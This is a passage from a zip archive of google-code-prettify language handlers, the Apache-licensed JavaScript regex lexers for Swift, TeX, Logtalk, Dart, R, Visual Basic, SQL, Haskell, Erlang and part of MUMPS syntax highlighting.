          [PR['PR_KEYWORD'],              /^\b(?:__COLUMN__|__FILE__|__FUNCTION__|__LINE__|#available|#else|#elseif|#endif|#if|#line|arch|arm|arm64|associativity|as|break|case|catch|class|continue|convenience|default|defer|deinit|didSet|do|dynamic|dynamicType|else|enum|extension|fallthrough|final|for|func|get|guard|import|indirect|infix|init|inout|internal|i386|if|in|iOS|iOSApplicationExtension|is|lazy|left|let|mutating|none|nonmutating|operator|optional|OSX|OSXApplicationExtension|override|postfix|precedence|prefix|private|protocol|Protocol|public|required|rethrows|return|right|safe|self|set|static|struct|subscript|super|switch|throw|try|Type|typealias|unowned|unsafe|var|weak|watchOS|while|willSet|x86_64)\b/, null],
          //double slash comments
          [PR['PR_COMMENT'],              /^\/\/.*?[\n\r]/, null],
          //slash star comments
          [PR['PR_COMMENT'],              /^\/\*[\s\S]*?(?:\*\/|$)/, null],
          //punctuation
          [PR['PR_PUNCTUATION'],          /^<<=|<=|<<|>>=|>=|>>|===|==|\.\.\.|&&=|\.\.<|!==|!=|&=|~=|~|\(|\)|\[|\]|{|}|@|#|;|\.|,|:|\|\|=|\?\?|\|\||&&|&\*|&\+|&-|&=|\+=|-=|\/=|\*=|\^=|%=|\|=|->|`|==|\+\+|--|\/|\+|!|\*|%|<|>|&|\||\^|\?|=|-|_/, null],
          [PR['PR_TYPE'],                 /^\b(?:[@_]?[A-Z]+[a-z][A-Za-z_$@0-9]*|\w+_t\b)/, null]   //borrowing the type regex given by the main program for C-family languages
        ]),
    ['swift']); 
PK!i@a�uu"it_sanctum/js/prettify/lang-tex.jsnu&1i�/**
 * @license
 * Copyright (C) 2011 Martin S.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Support for tex highlighting as discussed on
 * <a href="http://meta.tex.stackexchange.com/questions/872/text-immediate-following-double-backslashes-is-highlighted-as-macro-inside-a-code/876#876">meta.tex.stackexchange.com</a>.
 *
 * @author Martin S.
 */

PR['registerLangHandler'](
    PR['createSimpleLexer'](
        [
         // whitespace
         [PR['PR_PLAIN'],   /^[\t\n\r \xA0]+/, null, '\t\n\r \xA0'],
         // all comments begin with '%'
         [PR['PR_COMMENT'], /^%[^\r\n]*/, null, '%']
        ],
        [
         //[PR['PR_DECLARATION'], /^\\([egx]?def|(new|renew|provide)(command|environment))\b/],
         // any command starting with a \ and contains
         // either only letters (a-z,A-Z), '@' (internal macros)
         [PR['PR_KEYWORD'], /^\\[a-zA-Z@]+/],
         // or contains only one character
         [PR['PR_KEYWORD'], /^\\./],
         // Highlight dollar for math mode and ampersam for tabular
         [PR['PR_TYPE'],    /^[$&]/],
         // numeric measurement values with attached units
         [PR['PR_LITERAL'],
          /[+-]?(?:\.\d+|\d+(?:\.\d*)?)(cm|em|ex|in|pc|pt|bp|mm)/i],
         // punctuation usually occurring within commands
         [PR['PR_PUNCTUATION'], /^[{}()\[\]=]+/]
        ]),
    ['latex', 'tex']);
PK!��]Gqq&it_sanctum/js/prettify/lang-logtalk.jsnu&1i�/**
 * @license
 * Copyright (C) 2014 Paulo Moura
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler for Logtalk.
 * http://logtalk.org/
 * @author Paulo Moura
 */

PR['registerLangHandler'](
    PR['createSimpleLexer'](
        [
          // double-quoted strings.
          [PR['PR_STRING'], /^\"(?:[^\"\\\n\x0C\r]|\\[\s\S])*(?:\"|$)/, null, '"'],
          // atoms (don't break on underscores!)
          [PR['PR_LITERAL'], /^[a-z][a-zA-Z0-9_]*/],
          // quoted atoms
          [PR['PR_LITERAL'], /^\'(?:[^\'\\\n\x0C\r]|\\[^&])+\'?/, null, "'"],
          // numbers
          [PR['PR_LITERAL'], /^(?:0'.|0b[0-1]+|0o[0-7]+|0x[\da-f]+|\d+(?:\.\d+)?(?:e[+\-]?\d+)?)/i, null, '0123456789']
        ],
        [
          // single-line comments begin with %
          [PR['PR_COMMENT'], /^%[^\r\n]*/, null, '%'],
          // block comments are delimited by /* and */
          [PR['PR_COMMENT'], /^\/\*[\s\S]*?\*\//],
          // directives
          [PR['PR_KEYWORD'], /^\s*:-\s(c(a(lls|tegory)|oinductive)|p(ublic|r(ot(ocol|ected)|ivate))|e(l(if|se)|n(coding|sure_loaded)|xport)|i(f|n(clude|itialization|fo))|alias|d(ynamic|iscontiguous)|m(eta_(non_terminal|predicate)|od(e|ule)|ultifile)|reexport|s(et_(logtalk|prolog)_flag|ynchronized)|o(bject|p)|use(s|_module))/],
          [PR['PR_KEYWORD'], /^\s*:-\s(e(lse|nd(if|_(category|object|protocol)))|built_in|dynamic|synchronized|threaded)/],
          // variables
          [PR['PR_TYPE'], /^[A-Z_][a-zA-Z0-9_]*/],
          // operators
          [PR['PR_PUNCTUATION'], /^[.,;{}:^<>=\\/+*?#!-]/]
        ]),
    ['logtalk', 'lgt']);
PK!�Hju#it_sanctum/js/prettify/lang-dart.jsnu&1i�/**
 * @license
 * Copyright (C) 2013 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler Dart.
 * Loosely structured based on the DartLexer in Pygments: http://pygments.org/.
 *
 * To use, include prettify.js and this file in your HTML page.
 * Then put your code in an HTML tag like
 *      <pre class="prettyprint lang-dart">(Dart code)</pre>
 *
 * @author armstrong.timothy@gmail.com
 */

PR['registerLangHandler'](
  PR['createSimpleLexer'](
    [
      // Whitespace.
      [PR['PR_PLAIN'], /^[\t\n\r \xA0]+/, null, '\t\n\r \xA0']
    ],
    [
      // Script tag.
      [PR['PR_COMMENT'], /^#!(?:.*)/],

      // `import`, `library`, `part of`, `part`, `as`, `show`, and `hide`
      // keywords.
      [PR['PR_KEYWORD'], /^\b(?:import|library|part of|part|as|show|hide)\b/i],

      // Single-line comments.
      [PR['PR_COMMENT'], /^\/\/(?:.*)/],

      // Multiline comments.
      [PR['PR_COMMENT'], /^\/\*[^*]*\*+(?:[^\/*][^*]*\*+)*\//], // */

      // `class` and `interface` keywords.
      [PR['PR_KEYWORD'], /^\b(?:class|interface)\b/i],

      // General keywords.
      [PR['PR_KEYWORD'], /^\b(?:assert|async|await|break|case|catch|continue|default|do|else|finally|for|if|in|is|new|return|super|switch|sync|this|throw|try|while)\b/i],

      // Declaration keywords.
      [PR['PR_KEYWORD'], /^\b(?:abstract|const|extends|factory|final|get|implements|native|operator|set|static|typedef|var)\b/i],

      // Keywords for types.
      [PR['PR_TYPE'], /^\b(?:bool|double|Dynamic|int|num|Object|String|void)\b/i],

      // Keywords for constants.
      [PR['PR_KEYWORD'], /^\b(?:false|null|true)\b/i],

      // Multiline strings, single- and double-quoted.
      [PR['PR_STRING'], /^r?[\']{3}[\s|\S]*?[^\\][\']{3}/],
      [PR['PR_STRING'], /^r?[\"]{3}[\s|\S]*?[^\\][\"]{3}/],

      // Normal and raw strings, single- and double-quoted.
      [PR['PR_STRING'], /^r?\'(\'|(?:[^\n\r\f])*?[^\\]\')/],
      [PR['PR_STRING'], /^r?\"(\"|(?:[^\n\r\f])*?[^\\]\")/],

      // Types are capitalized by convention.
      [PR['PR_TYPE'], /^[A-Z]\w*/],

      // Identifiers.
      [PR['PR_PLAIN'], /^[a-z_$][a-z0-9_]*/i],

      // Operators.
      [PR['PR_PUNCTUATION'], /^[~!%^&*+=|?:<>/-]/],

      // Hex numbers.
      [PR['PR_LITERAL'], /^\b0x[0-9a-f]+/i],

      // Decimal numbers.
      [PR['PR_LITERAL'], /^\b\d+(?:\.\d*)?(?:e[+-]?\d+)?/i],
      [PR['PR_LITERAL'], /^\b\.\d+(?:e[+-]?\d+)?/i],

      // Punctuation.
      [PR['PR_PUNCTUATION'], /^[(){}\[\],.;]/]
    ]),
  ['dart']);
PK!-T�h	h	 it_sanctum/js/prettify/lang-r.jsnu&1i�/**
 * @license
 * Copyright (C) 2012 Jeffrey B. Arnold
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler for S, S-plus, and R source code.
 *
 *
 * To use, include prettify.js and this file in your HTML page.
 * Then put your code in an HTML tag like
 *      <pre class="prettyprint lang-r"> code </pre>
 *
 * Language definition from
 * http://cran.r-project.org/doc/manuals/R-lang.html.
 * Many of the regexes are shared  with the pygments SLexer,
 * http://pygments.org/.
 *
 * Original: https://raw.github.com/jrnold/prettify-lang-r-bugs/master/lang-r.js
 *
 * @author jeffrey.arnold@gmail.com
 */
PR['registerLangHandler'](
    PR['createSimpleLexer'](
        [
            [PR['PR_PLAIN'],       /^[\t\n\r \xA0]+/, null, '\t\n\r \xA0'],
	    [PR['PR_STRING'],      /^\"(?:[^\"\\]|\\[\s\S])*(?:\"|$)/, null, '"'],
	    [PR['PR_STRING'],      /^\'(?:[^\'\\]|\\[\s\S])*(?:\'|$)/, null, "'"]
        ],
        [
            [PR['PR_COMMENT'],     /^#.*/],
	    [PR['PR_KEYWORD'],     /^(?:if|else|for|while|repeat|in|next|break|return|switch|function)(?![A-Za-z0-9_.])/],
	    // hex numbes
	    [PR['PR_LITERAL'], /^0[xX][a-fA-F0-9]+([pP][0-9]+)?[Li]?/],
	    // Decimal numbers
            [PR['PR_LITERAL'], /^[+-]?([0-9]+(\.[0-9]+)?|\.[0-9]+)([eE][+-]?[0-9]+)?[Li]?/],
	    // builtin symbols
	    [PR['PR_LITERAL'], /^(?:NULL|NA(?:_(?:integer|real|complex|character)_)?|Inf|TRUE|FALSE|NaN|\.\.(?:\.|[0-9]+))(?![A-Za-z0-9_.])/],
	    // assignment, operators, and parens, etc.
	    [PR['PR_PUNCTUATION'], /^(?:<<?-|->>?|-|==|<=|>=|<|>|&&?|!=|\|\|?|\*|\+|\^|\/|!|%.*?%|=|~|\$|@|:{1,3}|[\[\](){};,?])/],
	    // valid variable names
	    [PR['PR_PLAIN'], /^(?:[A-Za-z]+[A-Za-z0-9_.]*|\.[a-zA-Z_][0-9a-zA-Z\._]*)(?![A-Za-z0-9_.])/],
	    // string backtick
	    [PR['PR_STRING'], /^`.+`/]
        ]),
    ['r', 's', 'R', 'S', 'Splus']);
PK!A�Kbb!it_sanctum/js/prettify/lang-vb.jsnu&1i�/**
 * @license
 * Copyright (C) 2009 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler for various flavors of basic.
 *
 *
 * To use, include prettify.js and this file in your HTML page.
 * Then put your code in an HTML tag like
 *      <pre class="prettyprint lang-vb"></pre>
 *
 *
 * http://msdn.microsoft.com/en-us/library/aa711638(VS.71).aspx defines the
 * visual basic grammar lexical grammar.
 *
 * @author mikesamuel@gmail.com
 */

PR['registerLangHandler'](
    PR['createSimpleLexer'](
        [
         // Whitespace
         [PR['PR_PLAIN'],       /^[\t\n\r \xA0\u2028\u2029]+/, null, '\t\n\r \xA0\u2028\u2029'],
         // A double quoted string with quotes escaped by doubling them.
         // A single character can be suffixed with C.
         [PR['PR_STRING'],      /^(?:[\"\u201C\u201D](?:[^\"\u201C\u201D]|[\"\u201C\u201D]{2})(?:[\"\u201C\u201D]c|$)|[\"\u201C\u201D](?:[^\"\u201C\u201D]|[\"\u201C\u201D]{2})*(?:[\"\u201C\u201D]|$))/i, null,
          '"\u201C\u201D'],
         // A comment starts with a single quote and runs until the end of the
         // line.
         // VB6 apparently allows _ as an escape sequence for newlines though
         // this is not a documented feature of VB.net.
         // http://meta.stackoverflow.com/q/121497/137403
         [PR['PR_COMMENT'],     /^[\'\u2018\u2019](?:_(?:\r\n?|[^\r]?)|[^\r\n_\u2028\u2029])*/, null, '\'\u2018\u2019']
        ],
        [
         [PR['PR_KEYWORD'], /^(?:AddHandler|AddressOf|Alias|And|AndAlso|Ansi|As|Assembly|Auto|Boolean|ByRef|Byte|ByVal|Call|Case|Catch|CBool|CByte|CChar|CDate|CDbl|CDec|Char|CInt|Class|CLng|CObj|Const|CShort|CSng|CStr|CType|Date|Decimal|Declare|Default|Delegate|Dim|DirectCast|Do|Double|Each|Else|ElseIf|End|EndIf|Enum|Erase|Error|Event|Exit|Finally|For|Friend|Function|Get|GetType|GoSub|GoTo|Handles|If|Implements|Imports|In|Inherits|Integer|Interface|Is|Let|Lib|Like|Long|Loop|Me|Mod|Module|MustInherit|MustOverride|MyBase|MyClass|Namespace|New|Next|Not|NotInheritable|NotOverridable|Object|On|Option|Optional|Or|OrElse|Overloads|Overridable|Overrides|ParamArray|Preserve|Private|Property|Protected|Public|RaiseEvent|ReadOnly|ReDim|RemoveHandler|Resume|Return|Select|Set|Shadows|Shared|Short|Single|Static|Step|Stop|String|Structure|Sub|SyncLock|Then|Throw|To|Try|TypeOf|Unicode|Until|Variant|Wend|When|While|With|WithEvents|WriteOnly|Xor|EndIf|GoSub|Let|Variant|Wend)\b/i, null],
         // A second comment form
         [PR['PR_COMMENT'], /^REM\b[^\r\n\u2028\u2029]*/i],
         // A boolean, numeric, or date literal.
         [PR['PR_LITERAL'],
          /^(?:True\b|False\b|Nothing\b|\d+(?:E[+\-]?\d+[FRD]?|[FRDSIL])?|(?:&H[0-9A-F]+|&O[0-7]+)[SIL]?|\d*\.\d+(?:E[+\-]?\d+)?[FRD]?|#\s+(?:\d+[\-\/]\d+[\-\/]\d+(?:\s+\d+:\d+(?::\d+)?(\s*(?:AM|PM))?)?|\d+:\d+(?::\d+)?(\s*(?:AM|PM))?)\s+#)/i],
         // An identifier.  Keywords can be turned into identifers
         // with square brackets, and there may be optional type
         // characters after a normal identifier in square brackets.
         [PR['PR_PLAIN'], /^(?:(?:[a-z]|_\w)\w*(?:\[[%&@!#]+\])?|\[(?:[a-z]|_\w)\w*\])/i],
         // A run of punctuation
         [PR['PR_PUNCTUATION'],
          /^[^\w\t\n\r \"\'\[\]\xA0\u2018\u2019\u201C\u201D\u2028\u2029]+/],
         // Square brackets
         [PR['PR_PUNCTUATION'], /^(?:\[|\])/]
        ]),
    ['vb', 'vbs']);
PK!)����
�
"it_sanctum/js/prettify/lang-sql.jsnu&1i�/**
 * @license
 * Copyright (C) 2008 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler for SQL.
 *
 *
 * To use, include prettify.js and this file in your HTML page.
 * Then put your code in an HTML tag like
 *      <pre class="prettyprint lang-sql">(my SQL code)</pre>
 *
 *
 * http://savage.net.au/SQL/sql-99.bnf.html is the basis for the grammar, and
 * http://msdn.microsoft.com/en-us/library/aa238507(SQL.80).aspx and
 * http://meta.stackoverflow.com/q/92352/137403 as the bases for the keyword
 * list.
 *
 * @author mikesamuel@gmail.com
 */

PR['registerLangHandler'](
    PR['createSimpleLexer'](
        [
         // Whitespace
         [PR['PR_PLAIN'],       /^[\t\n\r \xA0]+/, null, '\t\n\r \xA0'],
         // A double or single quoted, possibly multi-line, string.
         [PR['PR_STRING'],      /^(?:"(?:[^\"\\]|\\.)*"|'(?:[^\'\\]|\\.)*')/, null,
          '"\'']
        ],
        [
         // A comment is either a line comment that starts with two dashes, or
         // two dashes preceding a long bracketed block.
         [PR['PR_COMMENT'], /^(?:--[^\r\n]*|\/\*[\s\S]*?(?:\*\/|$))/],
         [PR['PR_KEYWORD'], /^(?:ADD|ALL|ALTER|AND|ANY|APPLY|AS|ASC|AUTHORIZATION|BACKUP|BEGIN|BETWEEN|BREAK|BROWSE|BULK|BY|CASCADE|CASE|CHECK|CHECKPOINT|CLOSE|CLUSTERED|COALESCE|COLLATE|COLUMN|COMMIT|COMPUTE|CONNECT|CONSTRAINT|CONTAINS|CONTAINSTABLE|CONTINUE|CONVERT|CREATE|CROSS|CURRENT|CURRENT_DATE|CURRENT_TIME|CURRENT_TIMESTAMP|CURRENT_USER|CURSOR|DATABASE|DBCC|DEALLOCATE|DECLARE|DEFAULT|DELETE|DENY|DESC|DISK|DISTINCT|DISTRIBUTED|DOUBLE|DROP|DUMMY|DUMP|ELSE|END|ERRLVL|ESCAPE|EXCEPT|EXEC|EXECUTE|EXISTS|EXIT|FETCH|FILE|FILLFACTOR|FOLLOWING|FOR|FOREIGN|FREETEXT|FREETEXTTABLE|FROM|FULL|FUNCTION|GOTO|GRANT|GROUP|HAVING|HOLDLOCK|IDENTITY|IDENTITYCOL|IDENTITY_INSERT|IF|IN|INDEX|INNER|INSERT|INTERSECT|INTO|IS|JOIN|KEY|KILL|LEFT|LIKE|LINENO|LOAD|MATCH|MATCHED|MERGE|NATURAL|NATIONAL|NOCHECK|NONCLUSTERED|NOCYCLE|NOT|NULL|NULLIF|OF|OFF|OFFSETS|ON|OPEN|OPENDATASOURCE|OPENQUERY|OPENROWSET|OPENXML|OPTION|OR|ORDER|OUTER|OVER|PARTITION|PERCENT|PIVOT|PLAN|PRECEDING|PRECISION|PRIMARY|PRINT|PROC|PROCEDURE|PUBLIC|RAISERROR|READ|READTEXT|RECONFIGURE|REFERENCES|REPLICATION|RESTORE|RESTRICT|RETURN|REVOKE|RIGHT|ROLLBACK|ROWCOUNT|ROWGUIDCOL|ROWS?|RULE|SAVE|SCHEMA|SELECT|SESSION_USER|SET|SETUSER|SHUTDOWN|SOME|START|STATISTICS|SYSTEM_USER|TABLE|TEXTSIZE|THEN|TO|TOP|TRAN|TRANSACTION|TRIGGER|TRUNCATE|TSEQUAL|UNBOUNDED|UNION|UNIQUE|UNPIVOT|UPDATE|UPDATETEXT|USE|USER|USING|VALUES|VARYING|VIEW|WAITFOR|WHEN|WHERE|WHILE|WITH|WITHIN|WRITETEXT|XML)(?=[^\w-]|$)/i, null],
         // A number is a hex integer literal, a decimal real literal, or in
         // scientific notation.
         [PR['PR_LITERAL'],
          /^[+-]?(?:0x[\da-f]+|(?:(?:\.\d+|\d+(?:\.\d*)?)(?:e[+\-]?\d+)?))/i],
         // An identifier
         [PR['PR_PLAIN'], /^[a-z_][\w-]*/i],
         // A run of punctuation
         [PR['PR_PUNCTUATION'], /^[^\w\t\n\r \xA0\"\'][^\w\t\n\r \xA0+\-\"\']*/]
        ]),
    ['sql']);
PK!CW99!it_sanctum/js/prettify/lang-hs.jsnu&1i�/**
 * @license
 * Copyright (C) 2009 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler for Haskell.
 *
 *
 * To use, include prettify.js and this file in your HTML page.
 * Then put your code in an HTML tag like
 *      <pre class="prettyprint lang-hs">(my lisp code)</pre>
 * The lang-cl class identifies the language as common lisp.
 * This file supports the following language extensions:
 *     lang-cl - Common Lisp
 *     lang-el - Emacs Lisp
 *     lang-lisp - Lisp
 *     lang-scm - Scheme
 *
 *
 * I used http://www.informatik.uni-freiburg.de/~thiemann/haskell/haskell98-report-html/syntax-iso.html
 * as the basis, but ignore the way the ncomment production nests since this
 * makes the lexical grammar irregular.  It might be possible to support
 * ncomments using the lookbehind filter.
 *
 *
 * @author mikesamuel@gmail.com
 */

PR['registerLangHandler'](
    PR['createSimpleLexer'](
        [
         // Whitespace
         // whitechar    ->    newline | vertab | space | tab | uniWhite
         // newline      ->    return linefeed | return | linefeed | formfeed
         [PR['PR_PLAIN'],       /^[\t\n\x0B\x0C\r ]+/, null, '\t\n\x0B\x0C\r '],
         // Single line double and single-quoted strings.
         // char         ->    ' (graphic<' | \> | space | escape<\&>) '
         // string       ->    " {graphic<" | \> | space | escape | gap}"
         // escape       ->    \ ( charesc | ascii | decimal | o octal
         //                        | x hexadecimal )
         // charesc      ->    a | b | f | n | r | t | v | \ | " | ' | &
         [PR['PR_STRING'],      /^\"(?:[^\"\\\n\x0C\r]|\\[\s\S])*(?:\"|$)/,
          null, '"'],
         [PR['PR_STRING'],      /^\'(?:[^\'\\\n\x0C\r]|\\[^&])\'?/,
          null, "'"],
         // decimal      ->    digit{digit}
         // octal        ->    octit{octit}
         // hexadecimal  ->    hexit{hexit}
         // integer      ->    decimal
         //               |    0o octal | 0O octal
         //               |    0x hexadecimal | 0X hexadecimal
         // float        ->    decimal . decimal [exponent]
         //               |    decimal exponent
         // exponent     ->    (e | E) [+ | -] decimal
         [PR['PR_LITERAL'],
          /^(?:0o[0-7]+|0x[\da-f]+|\d+(?:\.\d+)?(?:e[+\-]?\d+)?)/i,
          null, '0123456789']
        ],
        [
         // Haskell does not have a regular lexical grammar due to the nested
         // ncomment.
         // comment      ->    dashes [ any<symbol> {any}] newline
         // ncomment     ->    opencom ANYseq {ncomment ANYseq}closecom
         // dashes       ->    '--' {'-'}
         // opencom      ->    '{-'
         // closecom     ->    '-}'
         [PR['PR_COMMENT'],     /^(?:(?:--+(?:[^\r\n\x0C]*)?)|(?:\{-(?:[^-]|-+[^-\}])*-\}))/],
         // reservedid   ->    case | class | data | default | deriving | do
         //               |    else | if | import | in | infix | infixl | infixr
         //               |    instance | let | module | newtype | of | then
         //               |    type | where | _
         [PR['PR_KEYWORD'],     /^(?:case|class|data|default|deriving|do|else|if|import|in|infix|infixl|infixr|instance|let|module|newtype|of|then|type|where|_)(?=[^a-zA-Z0-9\']|$)/, null],
         // qvarid       ->    [ modid . ] varid
         // qconid       ->    [ modid . ] conid
         // varid        ->    (small {small | large | digit | ' })<reservedid>
         // conid        ->    large {small | large | digit | ' }
         // modid        ->    conid
         // small        ->    ascSmall | uniSmall | _
         // ascSmall     ->    a | b | ... | z
         // uniSmall     ->    any Unicode lowercase letter
         // large        ->    ascLarge | uniLarge
         // ascLarge     ->    A | B | ... | Z
         // uniLarge     ->    any uppercase or titlecase Unicode letter
         [PR['PR_PLAIN'],  /^(?:[A-Z][\w\']*\.)*[a-zA-Z][\w\']*/],
         // matches the symbol production
         [PR['PR_PUNCTUATION'], /^[^\t\n\x0B\x0C\r a-zA-Z0-9\'\"]+/]
        ]),
    ['hs']);
PK!�(#b�
�
%it_sanctum/js/prettify/lang-erlang.jsnu&1i�/**
 * @license
 * Copyright (C) 2013 Andrew Allen
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler for Erlang.
 *
 * Derived from https://raw.github.com/erlang/otp/dev/lib/compiler/src/core_parse.yrl
 * Modified from Mike Samuel's Haskell plugin for google-code-prettify
 *
 * @author achew22@gmail.com
 */

PR['registerLangHandler'](
    PR['createSimpleLexer'](
        [
         // Whitespace
         // whitechar    ->    newline | vertab | space | tab | uniWhite
         // newline      ->    return linefeed | return | linefeed | formfeed
         [PR['PR_PLAIN'],       /^[\t\n\x0B\x0C\r ]+/, null, '\t\n\x0B\x0C\r '],
         // Single line double-quoted strings.
         [PR['PR_STRING'],      /^\"(?:[^\"\\\n\x0C\r]|\\[\s\S])*(?:\"|$)/,
          null, '"'],
         
         // Handle atoms
         [PR['PR_LITERAL'],      /^[a-z][a-zA-Z0-9_]*/],
         // Handle single quoted atoms
         [PR['PR_LITERAL'],      /^\'(?:[^\'\\\n\x0C\r]|\\[^&])+\'?/,
          null, "'"],
         
         // Handle macros. Just to be extra clear on this one, it detects the ?
         // then uses the regexp to end it so be very careful about matching
         // all the terminal elements
         [PR['PR_LITERAL'],      /^\?[^ \t\n({]+/, null, "?"],

          
         
         // decimal      ->    digit{digit}
         // octal        ->    octit{octit}
         // hexadecimal  ->    hexit{hexit}
         // integer      ->    decimal
         //               |    0o octal | 0O octal
         //               |    0x hexadecimal | 0X hexadecimal
         // float        ->    decimal . decimal [exponent]
         //               |    decimal exponent
         // exponent     ->    (e | E) [+ | -] decimal
         [PR['PR_LITERAL'],
          /^(?:0o[0-7]+|0x[\da-f]+|\d+(?:\.\d+)?(?:e[+\-]?\d+)?)/i,
          null, '0123456789']
        ],
        [
         // TODO: catch @declarations inside comments

         // Comments in erlang are started with % and go till a newline
         [PR['PR_COMMENT'], /^%[^\n]*/],

         // Catch macros
         //[PR['PR_TAG'], /?[^( \n)]+/],

         /**
          * %% Keywords (atoms are assumed to always be single-quoted).
          * 'module' 'attributes' 'do' 'let' 'in' 'letrec'
          * 'apply' 'call' 'primop'
          * 'case' 'of' 'end' 'when' 'fun' 'try' 'catch' 'receive' 'after'
          */
         [PR['PR_KEYWORD'], /^(?:module|attributes|do|let|in|letrec|apply|call|primop|case|of|end|when|fun|try|catch|receive|after|char|integer|float,atom,string,var)\b/],
         
         /**
          * Catch definitions (usually defined at the top of the file)
          * Anything that starts -something
          */
         [PR['PR_KEYWORD'], /^-[a-z_]+/],

         // Catch variables
         [PR['PR_TYPE'], /^[A-Z_][a-zA-Z0-9_]*/],

         // matches the symbol production
         [PR['PR_PUNCTUATION'], /^[.,;]/]
        ]),
    ['erlang', 'erl']);
PK!%Q���$it_sanctum/js/prettify/lang-mumps.jsnu&1i�/**
 * @license
 * Copyright (C) 2011 Kitware Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler for MUMPS.
 *
 *
 * To use, include prettify.js and this file in your HTML page.
 * Then put your code in an HTML tag like
 *      <pre class="prettyprint lang-mumps">(my SQL code)</pre>
 * 
 * Commands, intrinsic functions and variables taken from ISO/IEC 11756:1999(E)
 *
 * @author chris.harris@kitware.com
 *
 * Known issues:
 * 
 * - Currently can't distinguish between keywords and local or global variables having the same name
 *   for exampe SET IF="IF?"
 * - m file are already used for MatLab hence using mumps.
 */

(function () {


var commands = 'B|BREAK|'       + 
               'C|CLOSE|'       +
               'D|DO|'          +
               'E|ELSE|'        +
               'F|FOR|'         +
               'G|GOTO|'        +
               'H|HALT|'        +
               'H|HANG|'        +
               'I|IF|'          +
               'J|JOB|'         +
               'K|KILL|'        +
               'L|LOCK|'        +
               'M|MERGE|'       +
               'N|NEW|'         +
               'O|OPEN|'        +     
               'Q|QUIT|'        +
               'R|READ|'        +
               'S|SET|'         +
               'TC|TCOMMIT|'    +
               'TRE|TRESTART|'  +
               'TRO|TROLLBACK|' +
               'TS|TSTART|'     +
               'U|USE|'         +
               'V|VIEW|'        +  
               'W|WRITE|'       +
               'X|XECUTE';

var intrinsicVariables = 'D|DEVICE|'       +
                         'EC|ECODE|'       +  
                         'ES|ESTACK|'      +
                         'ET|ETRAP|'       +
                         'H|HOROLOG|'      +
                         'I|IO|'           +
                         'J|JOB|'          +
                         'K|KEY|'          +
                         'P|PRINCIPAL|'    +
                         'Q|QUIT|'         +
                         'ST|STACK|'       +
                         'S|STORAGE|'      +
                         'SY|SYSTEM|'      +
                         'T|TEST|'         +
                         'TL|TLEVEL|'      +
                         'TR|TRESTART|'    +
                         'X|'              +
                         'Y|'              +
                         'Z[A-Z]*|';    

var intrinsicFunctions = 'A|ASCII|'        +
                         'C|CHAR|'         +
